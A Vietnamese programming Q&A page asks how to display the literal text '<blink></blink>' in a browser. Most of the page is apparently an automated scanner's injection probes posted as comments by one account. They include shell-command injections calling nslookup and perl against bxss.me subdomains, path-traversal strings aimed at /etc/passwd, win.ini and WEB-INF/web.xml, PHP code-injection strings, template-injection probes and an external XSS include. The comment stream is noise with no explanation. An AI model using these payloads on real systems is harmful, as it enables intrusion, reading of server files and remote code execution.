Mình có 1 đoạn code Html như sau:

<!DOCTYPE html>
<html>
         <head>
                   <title> Hiển thị tên thẻ </title>
         </head>
         <body>
                   Thẻ <blink></blink> dùng để 
                    tạo dòng chữ nhấp nháy
         </body>
</html>

Câu hỏi: Khi mình lưu file này và chạy trên trình duyệt thì nhận được dòng chữ: "Thẻ dùng để tạo dòng chữ nhấp nháy". Mọi người cho mình hỏi làm cách nào để in được cả dòng chữ :<blink></bilnk> ra trình duyệt ạ?

Viết câu trả lời

Drop Images

3 Bình luận

nhiepphong avatar

Bạn có thể chỉnh câu hỏi cho dõ dc ko

vuhungtb avatar

@nhiepphong : mình mún hỏi là làm cách nào để hiển thị cặp thẻ trên trình duyệt khi load trang

phqghume avatar
phqghume avatar

response.write(9931174*9522297)

phqghume avatar

'+response.write(9931174*9522297)+'

phqghume avatar

DbxqQySV

phqghume avatar

"+response.write(9931174*9522297)+"

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

echo gxtcyc$()\ ymteis\nz^xyu||a #' &echo gxtcyc$()\ ymteis\nz^xyu||a #|" &echo gxtcyc$()\ ymteis\nz^xyu||a #

phqghume avatar
phqghume avatar

&echo smidzv$()\ oirlfb\nz^xyu||a #' &echo smidzv$()\ oirlfb\nz^xyu||a #|" &echo smidzv$()\ oirlfb\nz^xyu||a #

phqghume avatar
phqghume avatar
phqghume avatar

../../../../../../../../../../../../../../etc/passwd

phqghume avatar

|echo scgfgb$()\ thqgtn\nz^xyu||a #' |echo scgfgb$()\ thqgtn\nz^xyu||a #|" |echo scgfgb$()\ thqgtn\nz^xyu||a #

phqghume avatar

12345'"\'\");|]*{ <>

phqghume avatar
phqghume avatar

../../../../../../../../../../../../../../windows/win.ini

phqghume avatar

(nslookup hitwqpycvjnoqcfee4.bxss.me||perl -e "gethostbyname('hitwqpycvjnoqcfee4.bxss.me')")

phqghume avatar
phqghume avatar

../../../../../../../../../../../../../../../proc/version

phqghume avatar

$(nslookup hitjsazltpdfba6287.bxss.me||perl -e "gethostbyname('hitjsazltpdfba6287.bxss.me')")

phqghume avatar
phqghume avatar

&(nslookup hitfjkdlpycaoec464.bxss.me||perl -e "gethostbyname('hitfjkdlpycaoec464.bxss.me')")&'\"0&(nslookup hitfjkdlpycaoec464.bxss.me||perl -e "gethostbyname('hitfjkdlpycaoec464.bxss.me')")&'

phqghume avatar

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

phqghume avatar
phqghume avatar

|(nslookup hitghdrbvqncu7ff84.bxss.me||perl -e "gethostbyname('hitghdrbvqncu7ff84.bxss.me')")

phqghume avatar

../../../../../../../../../../etc/passwd.vn/thanh-vien/nhiepphong) :

phqghume avatar
phqghume avatar
phqghume avatar

(nslookup hitappmtmuovocdb0e.bxss.me||perl -e "gethostbyname('hitappmtmuovocdb0e.bxss.me')")

phqghume avatar

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.vn/thanh-vien/nhiepphong) :

phqghume avatar
phqghume avatar
phqghume avatar

;(nslookup hituviqwxzwhf81fcf.bxss.me||perl -e "gethostbyname('hituviqwxzwhf81fcf.bxss.me')")|(nslookup hituviqwxzwhf81fcf.bxss.me||perl -e "gethostbyname('hituviqwxzwhf81fcf.bxss.me')")&(nslookup hituviqwxzwhf81fcf.bxss.me||perl -e "gethostbyname('hituviqwxzwhf81fcf.bxss.me')")

phqghume avatar

/../..//../..//../..//../..//../..//etc/passwd.vn/thanh-vien/nhiepphong) :

phqghume avatar
phqghume avatar
phqghume avatar

.\./.\./.\./.\./.\./.\./etc/passwd

phqghume avatar
phqghume avatar
phqghume avatar

/etc/passwd

phqghume avatar

${9999079+9999353}

phqghume avatar

%2fetc%2fpasswd

phqghume avatar

/.././.././.././.././.././.././.././../etc/./passwd%00

phqghume avatar
phqghume avatar

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

phqghume avatar
phqghume avatar

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

phqghume avatar

../././../././../././../././../././../././../././../././../././../././etc/passwd

phqghume avatar

@nhiepphong :e@nhiepphong : &n953934=v939526

phqghume avatar

..

phqghume avatar

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

phqghume avatar

1some_inexistent_file_with_long_name.vn/thanh-vien/nhiepphong) :

phqghume avatar
phqghume avatar

file:///etc/passwd

phqghume avatar
phqghume avatar
phqghume avatar

/../../../../../../../etc/passwd

phqghume avatar

)

phqghume avatar
phqghume avatar
phqghume avatar

/WEB-INF/web.xml

phqghume avatar

!(()&&!|||

phqghume avatar

bxss.me

phqghume avatar
phqghume avatar

C:\WINDOWS\system32\drivers\etc\hosts

phqghume avatar

^(#$!@#$)(()))**

phqghume avatar
phqghume avatar

../../../../../../../../../../windows/win.ini.vn/thanh-vien/nhiepphong) :

phqghume avatar

'.gethostbyname(lc('hitnf'.'xamcycijb4b7f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(90).chr(109).chr(79).'

phqghume avatar
phqghume avatar

/../../../../../../../../../../boot.ini

phqghume avatar

".gethostbyname(lc("hitwz"."njpfsfnc34472.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(68).chr(98).chr(71)."

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

................\windows\win.ini

phqghume avatar
phqghume avatar
phqghume avatar

................\windows\win.ini

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

/.\./.\./.\./.\./.\./.\./windows/win.ini

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

unexisting/../../../../../../../../../../windows/win.ini....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

WEB-INF/web.xml

phqghume avatar

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

phqghume avatar
phqghume avatar

WEB-INF\web.xml

phqghume avatar
phqghume avatar
phqghume avatar

';print(md5(31337));$a='

phqghume avatar
phqghume avatar

";print(md5(31337));$a="

phqghume avatar
phqghume avatar

"+"A".concat(70-3).concat(22*4).concat(98).concat(87).concat(107).concat(79)+(require"socket" Socket.gethostbyname("hitso"+"nbockqnic5302.bxss.me.")[3].to_s)+"

phqghume avatar

bxss.me/t/xss.html?%00

phqghume avatar
phqghume avatar

${@print(md5(31337))}

phqghume avatar
phqghume avatar

'+'A'.concat(70-3).concat(22*4).concat(100).concat(66).concat(104).concat(72)+(require'socket' Socket.gethostbyname('hitmw'+'ykmujiys7dedf.bxss.me.')[3].to_s)+'

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

${@print(md5(31337))}\

phqghume avatar
phqghume avatar

'.print(md5(31337)).'

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

tra-loi-comment

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

tra-loi-comment

phqghume avatar
phqghume avatar
phqghume avatar

/xfs.bxss.me

phqghume avatar

tra-loi-comment/.

phqghume avatar

911270

phqghume avatar
phqghume avatar
phqghume avatar

'"

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar